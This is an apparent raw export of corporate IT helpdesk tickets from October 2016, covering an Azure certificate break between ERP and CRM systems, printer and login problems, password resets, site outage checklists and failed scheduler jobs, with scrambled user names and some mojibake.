we have a connectivity issue between erp pi and msd crm due to certificate renewal on azure websites and that certificate is not yet updated on erp pi side.
issue: changes to data records (accounts, sales area data, partner functions, contacts, leads) are not being processed from erp pi to 
worked with IT
msd crm and vice versa in all environments (prod, qa and dev).
issue start time: 24th oct ~8:15pm
troubleshooting steps: 
1. when tryhdty from customer master team reported the issue that a prospect account created in erp didn't come into msd yet â€“ erp pi team observed that the records are in "still awaiting acknowledgement" status â€“ which basically means they are not yet delivered/received by the target system.
2. upon some log analysis and trying to identify the root cause between erp pi, basis and msd teams â€“ it's been observed that the issue has started in production environment since around 8:15pm est on 24th oct.
3. we observed the same behavior with azure mfg_tool and erp pi logs of other non-production environments as well.
4. you can find error screenshots from erp pi system in the mail chain.
root cause: it appears that the certificate for azure webapps have been updated on 29th sept 2016 as it is nearing the expiration date (11th jan 2017). but the new certificate is not updated on erp pi (they are not even aware of this change!). so, when the production azure webapp (company-crm-sp-mfg_toolt.azurewebsites.net) got restarted on 24th oct around 8:15pm â€“ this connectivity appears to have been broken.
next steps: 
1. we need the azure webapp certificate chain to be sent to erp basis team so that they can update it on erp pi system. whom can i reach out to for receiving the certificate details? do we have an azure admin in house or do you want me to open a case with microsoft?
2. once certificate is received, maybe we can first do this on qa system and then upon confirmation that it works, we can apply it to production and other environments.
</t>
  </si>
  <si>
    <t>kgytujhe bonhwzrx</t>
  </si>
  <si>
    <t>printer problem / issue information</t>
  </si>
  <si>
    <t>please complete all required questions below.  
if not, it will be returned back to the gsc / requester to provide required information
 â€¢  gsc to review ticket, if not able to resolve then please assign to appropriate group per your printer problem assignment flowchart.
   â€¢  printer name / make - model?  (ex hq50 â€“ wy98 - hp 8150) kd05
   â€¢  detailed description of the problem ? error - says i need to download and install a software driver from the \\HostName_769 computer to print to kd05
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) word
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)
   â€¢  what system or application being used at time of the problem?      (ex windows / erp /)  windows
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?  not sure what this means
   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm)  not erp
      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily?  not erp
         what printer can it be rerouted too? 
   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket.</t>
  </si>
  <si>
    <t>dzjxrkae grqczsmx</t>
  </si>
  <si>
    <t>power outage :australia australia: site hard down since at 7.31am et on 10/27.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)
1. top 23 cert site   ?    _____no____     (yes/no/na) 
2. when did it start  ?   ______7.31am et on 10/27._______________
3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power _________
4.  scheduled maintenance ( network) ? __no_____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    
5. does site have a backup circuit ?  yes______    (yes/no/na) 
6. backup circuit active ?   ___no_____     (yes/no/na) 
7. site contact notified (phone/email) ?  ____na_____     (yes/no/na) 
8. remote dial-in ?   _____na______   (yes/no/na) 
9. equipment reset ?    ____na_______    (yes/no/na) 
10. verified site working on backup circuit ?  __na_____     (yes/no/na) 
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ________global_telecom_2 # 272076960 _________________       
12. notified  gsc  ___na_____     (yes/no/na)    cert started  ?________    (yes/no/na) 
13.  additional diagnostics</t>
  </si>
  <si>
    <t xml:space="preserve">unable to log into erp </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ygkzwsud.cvjgkxws@gmail.com_x000D_
_x000D_
hello team,_x000D_
_x000D_
i am unable to log into my erp account, even the correct password id not accepted._x000D_
_x000D_
need resolution on very urgent basis._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ygkzwsud cvjgkxws</t>
  </si>
  <si>
    <t>hcplzsxg qkujnapl</t>
  </si>
  <si>
    <t xml:space="preserve">activate iphone </t>
  </si>
  <si>
    <t xml:space="preserve">iygsxftl hysrbgad set up a spare "company owned" iphone, cause the old one was broken._x000D_
agreement and supervisors appoval is attached_x000D_
now his account is quarantined._x000D_
could you please activate his new device._x000D_
</t>
  </si>
  <si>
    <t>fbyusmxz kxvmcbly</t>
  </si>
  <si>
    <t>login issue_x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad and reset the password._x000D_
-advised the user to login and check._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>serckxqb mljnkgze</t>
  </si>
  <si>
    <t>unable to print to printer</t>
  </si>
  <si>
    <t xml:space="preserve">ic: welcome, our next available agent will be with you shortly...
ic: interaction alerting agent.
ic: website visitor has joined the conversation
ayrhcfxi zartupsw: hi 
ayrhcfxi zartupsw: </t>
  </si>
  <si>
    <t>vsbtygin oufhtbas</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2668 failed in job_scheduler at: 10/27/2016 06:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2668 failed in job_scheduler at: 10/27/2016 06:06:00</t>
  </si>
  <si>
    <t>outlook crashing</t>
  </si>
  <si>
    <t xml:space="preserve">ic: welcome, our next available agent will be with you shortly...
ic: interaction alerting agent.
ic: website visitor has joined the conversation
ayrhcfxi zartupsw: hello 
gstdy yrada: hi
ayrhcfxi zartupsw: hello, </t>
  </si>
  <si>
    <t>GRP_27</t>
  </si>
  <si>
    <t>tphbruoq xtukhnym</t>
  </si>
  <si>
    <t>need file restored on t drive</t>
  </si>
  <si>
    <t xml:space="preserve">ic: welcome, our next available agent will be with you shortly..._x000D_
ic: interaction alerting agent._x000D_
ic: website visitor has joined the conversation_x000D_
ayrhcfxi zartupsw: hello, </t>
  </si>
  <si>
    <t>kslhobgj cyhvefna</t>
  </si>
  <si>
    <t>SID_1 logon balancing error</t>
  </si>
  <si>
    <t xml:space="preserve">ic: welcome, our next available agent will be with you shortly...
ic: interaction alerting agent.
ic: website visitor has joined the conversation
tyss ashdtyf: greetings
ayrhcfxi zartupsw: , hi 
ayrhcfxi zartupsw: </t>
  </si>
  <si>
    <t>zstkagwu jlyrhdcf</t>
  </si>
  <si>
    <t>unable to login to sfb</t>
  </si>
  <si>
    <t>name:obanjrhg rnafleys
language:
browser:microsoft internet explorer
email:obanjrhg.rnafleys@gmail.com
customer number:
summary:hello,
problem signing in to skype</t>
  </si>
  <si>
    <t>obanjrhg rnafleys</t>
  </si>
  <si>
    <t>reset the password for fygrwuna gomcekzi on e-mail</t>
  </si>
  <si>
    <t xml:space="preserve">bitte passwort fÃ¼r fygrwuna gomcekzi e-mail zurÃ¼cksetzen
bitte neues passwort zu cwrikael.oanmsecr@gmail.com (manager) </t>
  </si>
  <si>
    <t>fygrwuna gomcekzi</t>
  </si>
  <si>
    <t>password resetfor SID_37</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xyculgav.cuqptoah@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please unlock and reset my password for SID_37 system._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>xyculgav cuqptoah</t>
  </si>
  <si>
    <t>babiluntr client license expired and client is now in uacyltoe hxgaycze mode - eagl8111495 - tel.: -474</t>
  </si>
  <si>
    <t>GRP_28</t>
  </si>
  <si>
    <t>dkinobsv wymgzcrh</t>
  </si>
  <si>
    <t>outbound calls not possible via germany pbx system - inbound calls are working fine - please check</t>
  </si>
  <si>
    <t>dqeowzux cjorxvew</t>
  </si>
  <si>
    <t>probleme mit laufwerk z: \laeusvjo fvaihgpx</t>
  </si>
  <si>
    <t>laeusvjo fvaihgpx</t>
  </si>
  <si>
    <t>pls also extend mm#7389861 &amp; 7421988 to my purchasing user account. need to create prs for both mm#.</t>
  </si>
  <si>
    <t xml:space="preserve">pls also extend mm#7389861 &amp; 7421988 to my purchasing user account. need to create prs for both mm#. </t>
  </si>
  <si>
    <t>GRP_29</t>
  </si>
  <si>
    <t>ckitashy dnqojbwi</t>
  </si>
  <si>
    <t>the t/o can not be generated for dn 8058611713</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gjtyswkb.dpvaymxr@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
would you pls help to check dn 9169722824,t/o can not be generated for this dn, </t>
  </si>
  <si>
    <t>gjtyswkb dpvaymxr</t>
  </si>
  <si>
    <t>itry to open a excel file with microsoft online but not work</t>
  </si>
  <si>
    <t>name:
language:
browser:microsoft internet explorer
email:mfrsnagc.mhakdfjo@gmail.com
customer number:
summary:itry to open a excel file with microsoft online but not work</t>
  </si>
  <si>
    <t>mfrsnagc mhakdfjo</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to hr_tool </t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to hr_tool 
</t>
  </si>
  <si>
    <t>vip2-i have been unable to access my pay&amp;taxes tab for several days. hangs on a time clock. what do i need to do to reso</t>
  </si>
  <si>
    <t xml:space="preserve">from: gstdy tehdy 
sent: thursday, october 27, 2016 11:53 am
to: vkjdgtxb pkinmjqs
subject: re:  fw: access to e-time
dear ,
</t>
  </si>
  <si>
    <t>vkjdgtxb pkinmjqs</t>
  </si>
  <si>
    <t>business_client not working</t>
  </si>
  <si>
    <t>jbiuvsfk pkvgyhqx</t>
  </si>
  <si>
    <t>reporting_tool erp hana error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lhejbwkc.xbmyvnqf@gmail.com_x000D_
_x000D_
hi_x000D_
_x000D_
everytime i want to set a filter in reporting_tool with data source_x000D_
_x000D_
pk_publish_pk_otc_billing_otc_billing_s_x000D_
_x000D_
i am getting below error message:_x000D_
_x000D_
_x000D_
[cid:image001.png@01d2302e.38de0930]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>lhejbwkc xbmyvnqf</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrattr failed in job_scheduler at: 10/27/2016 02:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrattr failed in job_scheduler at: 10/27/2016 02:25:00</t>
  </si>
  <si>
    <t>please reset my erp and bex password - seem to by not synchronized - thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: fmzdkyqv.dbrslnhe@gmail.com
fmzdkyqv dbrslnhe
director finance business
company
fmzdkyqv.dbrslnhe@gmail.com&lt;mailto:fmzdkyqv.dbrslnhe@gmail.com&gt;
</t>
  </si>
  <si>
    <t>fmzdkyqv dbrslnhe</t>
  </si>
  <si>
    <t>netweaver funktioniert nicht mehr</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fcyuqvoj.ajqeidlm@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
netweaver funktioniert nicht mehr, bzw. kann ich nicht mehr Ã¶ffnen._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.png@01d23026.26b6a440]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>fcyuqvoj ajqeidlm</t>
  </si>
  <si>
    <t xml:space="preserve">a kÃ¼ndigung for fgxprnub hlanwgqj, 11161827, effective 31.05.2017 has been approved. </t>
  </si>
  <si>
    <t>ucawbivs ountxzir</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1854 failed in job_scheduler at: 10/27/2016 01:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1854 failed in job_scheduler at: 10/27/2016 01:36:00</t>
  </si>
  <si>
    <t xml:space="preserve">outlook setting is changed </t>
  </si>
  <si>
    <t>scjxobhd ldypjkmf</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2584 failed in job_scheduler at: 10/27/2016 01:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2584 failed in job_scheduler at: 10/27/2016 01:30:00</t>
  </si>
  <si>
    <t>neues passwort fÃ¼r accountname tgryhu hgygrtui</t>
  </si>
  <si>
    <t>neues passwort fÃ¼r accountname tgryhu hgygrtui. passwort fÃ¼r diesen account funktioniert nicht mehr. mitarbeiter ist in kw4456 und 4567 auf frÃ¼hschicht anwesend.</t>
  </si>
  <si>
    <t>nemzycxb xpsgkahw</t>
  </si>
  <si>
    <t>check status tab is not appearing in purchasing screen</t>
  </si>
  <si>
    <t>check status button is not seen in my purchasing screen</t>
  </si>
  <si>
    <t>shjbrutf iknuqswm</t>
  </si>
  <si>
    <t>drucker / scanner em85678
 scanner findet pfad nicht mehr!</t>
  </si>
  <si>
    <t>lpfwkotn keycvxsl</t>
  </si>
  <si>
    <t>unable to open erp SID_34 while in office</t>
  </si>
  <si>
    <t>without logging in to vpn remote, i am unable to login to erp. it throws balancing error</t>
  </si>
  <si>
    <t>kiqrvwat gwkpxzyt</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tfnzwycd.bicohjga@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
provide me immediately the skype meeting options , presently it is not enabled_x000D_
_x000D_
[cid:image002.png@01d23031.68ed5240]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>tfnzwycd bicohjga</t>
  </si>
  <si>
    <t>outlookæ”¶åˆ°ç®±ä¸­folderå˜ä¸ºæ¯å¤©ä¸€ä¸ªfolderï¼Œofficeæç¤ºæ›´æ–°ã€‚</t>
  </si>
  <si>
    <t>GRP_30</t>
  </si>
  <si>
    <t>bxfdkiol mdqlszvc</t>
  </si>
  <si>
    <t>can not login skype</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
received from: icvulkwh.udnyietg@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
i can not login the skype, would you pls help to check it ,</t>
  </si>
  <si>
    <t>GRP_31</t>
  </si>
  <si>
    <t>icvulkwh udnyietg</t>
  </si>
  <si>
    <t>sn 04os20400001808 has been identified as unavailable via esrs monitoring services and you may have no esrs connectivity</t>
  </si>
  <si>
    <t>unable to create delivery:mm#2110924 can print d/n, but can't post. detail information see attachment.</t>
  </si>
  <si>
    <t>please provide the following:_x000D_
_x000D_
what order number? _x000D_
_x000D_
what material or item number?  mm#2110924_x000D_
_x000D_
what warehouse location? plant_308 0001 _x000D_
_x000D_
issue description / error message? see attachment</t>
  </si>
  <si>
    <t>bjrtfeyi fuqapwtv</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 account locked </t>
  </si>
  <si>
    <t>afijkocw rjtxslpa</t>
  </si>
  <si>
    <t xml:space="preserve">unable to down load ethics module </t>
  </si>
  <si>
    <t xml:space="preserve">from: brdhdd dhwduw
sent: thursday, october 27, 2016 6:12 am
to: nwfodmhc exurcwkm
subject::fwd: unable to down load ethics module 
begin forwarded message:
from:  &lt;dqwhpjxy.pozjxbey@gmail.com&gt;
to:  &lt;zanivrec.capbfhur@gmail.com&gt;
subject: unable to down load ethics module 
hi  â€“ trust doing well . i am unable to down load &amp; getting below msg. i did reset resolution however still same issue persist.
please help.
director of sales 
company indirect channels  - asia 
&amp; 
dqwhpjxy.pozjxbey@gmail.com 
</t>
  </si>
  <si>
    <t>dqwhpjxy pozjxbey</t>
  </si>
  <si>
    <t>è½¬å‘:  company email to private phone-hprdlbxf nozjtgwi</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hprdlbxf.nozjtgwi@gmail.com_x000D_
_x000D_
all_x000D_
_x000D_
please help to set up the email access to my private own cell phone._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>hprdlbxf nozjtgwi</t>
  </si>
  <si>
    <t>network outage: , india: site hard down since at 7:23 pm et at 10/26. no backup circuit.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________7:23 pm et at 10/26.______________x000D_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_____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___na____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ____telecom_vendor_1#25191486_____________________       _x000D_
_x000D_
12. notified  gsc  ___na_____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>unable to log in to ess</t>
  </si>
  <si>
    <t>zqvpaxry yvzodtqp</t>
  </si>
  <si>
    <t xml:space="preserve">skype error while logging in </t>
  </si>
  <si>
    <t>nyjvwsxf npwoglzf</t>
  </si>
  <si>
    <t xml:space="preserve">vitalyst transfer: crm installation </t>
  </si>
  <si>
    <t>anpocezt qturbxsg</t>
  </si>
  <si>
    <t>unable to access benefits tab</t>
  </si>
  <si>
    <t>qlpmxbno fjxuqbew</t>
  </si>
  <si>
    <t>laptop is very slow,  any dialog bog i open is choppy &amp; flickers....  delayed</t>
  </si>
  <si>
    <t>ieptnhox xastpbfy</t>
  </si>
  <si>
    <t>ticket update on inplant_873601</t>
  </si>
  <si>
    <t>running full production and need erp update pushed out for several hours.</t>
  </si>
  <si>
    <t>summary:for saturday october 29 th  we will be running full production and need erp update pushed out for several hours.</t>
  </si>
  <si>
    <t>xrmvbenu pynjmqci</t>
  </si>
  <si>
    <t>india:  29060s-access-sw01 and sw02 went down at 02:12 pm et on 10/26.</t>
  </si>
  <si>
    <t>need password reset</t>
  </si>
  <si>
    <t>mkozqvfr ixsqykhe</t>
  </si>
  <si>
    <t>issues with pdf viewer on iphone for davidthd</t>
  </si>
  <si>
    <t>engineering_tools not connected to network even though vpn is connected.</t>
  </si>
  <si>
    <t>tgseqfni ehlabdtf</t>
  </si>
  <si>
    <t>outlook/crm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: anpocezt.qturbxsg@gmail.com_x000D_
_x000D_
are having issue with outlook and crm on our phone and computers?_x000D_
_x000D_
sent from my iphone_x000D_
best </t>
  </si>
  <si>
    <t>need erp password reset for hdty.yrhxssytu@company.com</t>
  </si>
  <si>
    <t>ldgyxbrm cdporkfj</t>
  </si>
  <si>
    <t>i need security for the uacyltoe hxgaycze and dev copies of crm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: azxhejvq.fyemlavd@gmail.com_x000D_
_x000D_
to do some general uacyltoe hxgayczeing and training i will need access to the training and development application for microsoft dynamics._x000D_
_x000D_
mikhghytr wafglhdrhjop_x000D_
sr. manager, global ethics and compliance programdntys_x000D_
o:724-539-5147 m:412-558-3346 f:866-635-3932_x000D_
_x000D_
company inc | 1600 technology way  | usa pa  15650-0231_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>azxhejvq fyemlavd</t>
  </si>
  <si>
    <t>internal users are unable to download discount price file on distributor_tool / company center</t>
  </si>
  <si>
    <t xml:space="preserve">internal users are unable to download discount price file on distributor_tool / company center.  the issue is probably related to the change made for ftp download.  we need to fix issues aerp as this is causing lost sales.  
external users works fine.
all,
zsdr0shstrud
is the price maintenance abap report for the pricing team to maintain price data in erp erp and it is going to be limited to pricing functions for all price related uploads into erp.
however, the function "distributor discount report" from that report i don't see a problem to usa access also for internal users (especially as the external users seem to have already access to it):
best </t>
  </si>
  <si>
    <t>stdezpqw bkmeuhfz</t>
  </si>
  <si>
    <t>unable to login to collaboration_platform</t>
  </si>
  <si>
    <t>vmfopnsj nuhldvxw</t>
  </si>
  <si>
    <t>unable to receive emails on company provided iphone</t>
  </si>
  <si>
    <t>naecuhxz hdrqvume</t>
  </si>
  <si>
    <t>rlhkfdqa fmhioqla</t>
  </si>
  <si>
    <t>EU_tool ist sehr langsadgtym \ywqgrbnx jwnsyzbv \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for sgblhypi.htqmidsn@gmail.com</t>
  </si>
  <si>
    <t>sgblhypi htqmidsn</t>
  </si>
  <si>
    <t>alte eq abholen \wrcktgbd wzrgyunp</t>
  </si>
  <si>
    <t>wrcktgbd wzrgyunp</t>
  </si>
  <si>
    <t>probleme lan an tgeyd1 \we_wu113 \wrcktgbd wzrgyunp</t>
  </si>
  <si>
    <t>support fÃ¼r we111\zlqfptjx xnklbfua</t>
  </si>
  <si>
    <t>zlqfptjx xnklbfua</t>
  </si>
  <si>
    <t>username locked</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: inhekdol.anvqzdif@gmail.com
hello,
username "gdthryd"; mgvpoyqd tnlshpwb, is locked out of his computer. i am sending this message on his behalf.
please help,
inhekdol anvqzdif
quality technologist
inhekdol.anvqzdif@gmail.com&lt;mailto:inhekdol.anvqzdif@gmail.com&gt;
</t>
  </si>
  <si>
    <t>inhekdol anvqzdif</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to lan internet </t>
  </si>
  <si>
    <t>qwreamdz pmarxvtk</t>
  </si>
  <si>
    <t>install collaboration_platform</t>
  </si>
  <si>
    <t>cqwtksbu tgxockrn</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for hbcejwsz.cejsmdpf@gmail.com</t>
  </si>
  <si>
    <t>hbcejwsz cejsmdpf</t>
  </si>
  <si>
    <t xml:space="preserve">ticket update </t>
  </si>
  <si>
    <t>pbhmwqtz wqlbudjx</t>
  </si>
  <si>
    <t>wjsfbpuv lcpdfihr</t>
  </si>
  <si>
    <t>cannot access guest wifi sponsor portal</t>
  </si>
  <si>
    <t xml:space="preserve">receive "sponsor portal internal error" when attempting to issue guest wifi access_x000D_
this is the link i was given to use:_x000D_
#createknownaccountssummary_x000D_
</t>
  </si>
  <si>
    <t>ctxwsvam vwgpjauf</t>
  </si>
  <si>
    <t>user needs help to login to the company vpn.</t>
  </si>
  <si>
    <t>user needs help to login to the company vpn._x000D_
-connected to the user system using teamviewer._x000D_
-help the user login to the company vpn._x000D_
-user confirmed he is now abl eto login to the erp SID_34._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>need to map mailboxes of colleagues.</t>
  </si>
  <si>
    <t>tbepisvq fxvgltmp</t>
  </si>
  <si>
    <t>erp SID_34 password reset</t>
  </si>
  <si>
    <t>lbtrsuev fxyrgeps</t>
  </si>
  <si>
    <t>new team details not updated on bobj reports from ess</t>
  </si>
  <si>
    <t>new team and manager details not updated on bobj reports from ess. on opening the bex reports from ess (refer screenshot) the reports still shows the old team data. need to reflect the new team data._x000D_
_x000D_
new manager details are already updated on erp._x000D_
_x000D_
phone: 204 78sartlgeo lhqksbdx902</t>
  </si>
  <si>
    <t>owtlmpuv oicrjsfh</t>
  </si>
  <si>
    <t>email font showing very small when replying to emails.</t>
  </si>
  <si>
    <t>email font showing very small when replying to emails._x000D_
-connected to the user system using teamviewer_x000D_
-corrected the font size._x000D_
-advised the user to check now._x000D_
-user confirmed all is fine now._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>dqgjxhrt kydnpacx</t>
  </si>
  <si>
    <t>reset passwords for hdthy v hstdd using password_management_tool password reset.</t>
  </si>
  <si>
    <t>kcnosyae zlpmfxgs</t>
  </si>
  <si>
    <t>computer in the maintenance dept. is down. please fix.</t>
  </si>
  <si>
    <t>juaxnvwz reampilj</t>
  </si>
  <si>
    <t>computer is down in the old cnc area. please fix for erp.</t>
  </si>
  <si>
    <t>user needs new telephony_software password.</t>
  </si>
  <si>
    <t xml:space="preserve">user needs new telephony_software password.
</t>
  </si>
  <si>
    <t>mvaxhzks kyzvflth</t>
  </si>
  <si>
    <t>vip  - printer connection request to ag99435</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sbgvrncj.idfhtoqv@gmail.com
hello,
i want to connect my workstation to printer ag99435 in germany.
the following screen shot says i need permission to connect to this printer from the system administrator.
[cid:image003.jpg@01d22f99.9aa063b0]
many </t>
  </si>
  <si>
    <t>sbgvrncj idfhtoqv</t>
  </si>
  <si>
    <t>i cannot get onto the network on my pc.</t>
  </si>
  <si>
    <t>ubqjihpt pzrjxmgd</t>
  </si>
  <si>
    <t>vip 1 :login issue</t>
  </si>
  <si>
    <t>login issue_x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad and unlocked the account.._x000D_
-advised the user to login and check._x000D_
-caller confirmed that she was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>tqjsmwvk arqoytbh</t>
  </si>
  <si>
    <t>misplaced password for the hub</t>
  </si>
  <si>
    <t>unable to login to the hub</t>
  </si>
  <si>
    <t>heuvlktj ulzcsyvi</t>
  </si>
  <si>
    <t>please reset my SID_34 password</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: azxhejvq.fyemlavd@gmail.com
user id  gdthrujt
</t>
  </si>
  <si>
    <t>need to setup guest wi fi access</t>
  </si>
  <si>
    <t>hmgbwyce sacuoyfe</t>
  </si>
  <si>
    <t>trouble viewing and printing commerirtcal inwarehouse_tools</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: iksqbuxf.muzxgwvk@gmail.com_x000D_
_x000D_
good day._x000D_
_x000D_
please assist with issue below._x000D_
_x000D_
[cid:image001.png@01d22f8f.02e693a0]_x000D_
_x000D_
[cid:image002.png@01d22f8f.02e693a0]_x000D_
_x000D_
when clicking to view the commercial inwarehouse_tool, this appears blank._x000D_
_x000D_
please help._x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>iksqbuxf muzxgwvk</t>
  </si>
  <si>
    <t>outlook won't open.</t>
  </si>
  <si>
    <t>rjfmpgdq outipdcm</t>
  </si>
  <si>
    <t>engineering tool takes a long time to load</t>
  </si>
  <si>
    <t>issue is severe especially after 3:30 pm everyday._x000D_
wants to talk to engineering tool administration team to check on account.</t>
  </si>
  <si>
    <t>janivrtg hstolemu</t>
  </si>
  <si>
    <t>folders list in outlook dierppeared</t>
  </si>
  <si>
    <t>cannot see any of the folders, in outlook, emails appeared in the view</t>
  </si>
  <si>
    <t>ijmabvlz vosuedkm</t>
  </si>
  <si>
    <t>snxlwqzo uxkgdiov</t>
  </si>
  <si>
    <t>cannot connect to network resources in hq</t>
  </si>
  <si>
    <t xml:space="preserve">cannot access erp, hq network drives
internal network drive access is working fine.
performed a flush dns / winsock reset, still nogo.
multiple users affected
ip: 10.170.245.10
</t>
  </si>
  <si>
    <t>mfvkxghn mzjasxqd</t>
  </si>
  <si>
    <t>dringend : schulungsraum 1 . sprechanlage funktioniert nicht.</t>
  </si>
  <si>
    <t xml:space="preserve">schulungsraum 1 . sprechanlage funktioniert nicht._x000D_
</t>
  </si>
  <si>
    <t>qrmbywzv mnvdcuhj</t>
  </si>
  <si>
    <t>data back up for germany</t>
  </si>
  <si>
    <t>bjtguqne xthqrzpc</t>
  </si>
  <si>
    <t xml:space="preserve">server ekpsm005678 located at germany location is down since 2:27am on 10/15/16 </t>
  </si>
  <si>
    <t>dkmcfreg anwmfvlg</t>
  </si>
  <si>
    <t>germany - (company):pbx trunk card &amp;pbx  since 6:11 am et on 10/26.</t>
  </si>
  <si>
    <t>oldrctiu bxurpsyi</t>
  </si>
  <si>
    <t>konto gespaerrt.</t>
  </si>
  <si>
    <t>mtairqlh zuhyfmnp</t>
  </si>
  <si>
    <t>unable to sign in to the vpn</t>
  </si>
  <si>
    <t>i am not able to sign onto vpn with my user name and password.  it says incorrect password, but it is the one i always use.</t>
  </si>
  <si>
    <t>lwgytuxq qspdztiw</t>
  </si>
  <si>
    <t>security incidents - ( #in33071122 ) :[ipbl]: [no entry] beshryulisted ip - lmsl8405227</t>
  </si>
  <si>
    <t xml:space="preserve">source ip :
system name :lmsl9516338
user  name:trhdyd mffbsf
location :usa
sep , sms status :no updates
field sales user ( yes / no) :  yes
dsw event log:see below
</t>
  </si>
  <si>
    <t>gzhapcld fdigznbk</t>
  </si>
  <si>
    <t>shortcut opening multiple folders</t>
  </si>
  <si>
    <t>hnkwirgv wdgebvpz</t>
  </si>
  <si>
    <t xml:space="preserve">system updation for govt. tender e-procurement </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qalyeunp.eiyrcxog@gmail.com
dear sir,
we required system updating for govt. tender uploading in e-portal on the following computer:
computer name :  aiuw8911576789
service tag no.    :  jnjxbq1234
model details :  optiplex 780
please do the needful and  confirm on urgent basis.
with kind  </t>
  </si>
  <si>
    <t>qalyeunp eiyrcxog</t>
  </si>
  <si>
    <t>unable to login to pc</t>
  </si>
  <si>
    <t>urgent - access to rtnzvplq erhmuncq disconnected</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: osjqfbvw.hlmgrfpx@gmail.com
hi,
could you please help, after an error message "server disconnected" i cannot make any edits to trgdyyufs' calendar, no invitations from his calendar, no calendar entries possible.
very urgent.
</t>
  </si>
  <si>
    <t>osjqfbvw hlmgrfpx</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2103 failed in job_scheduler at: 10/26/2016 05:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2103 failed in job_scheduler at: 10/26/2016 05:43:00</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_conf_ap1 failed in job_scheduler at: 10/26/2016 05:42:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_conf_ap1 failed in job_scheduler at: 10/26/2016 05:42:00</t>
  </si>
  <si>
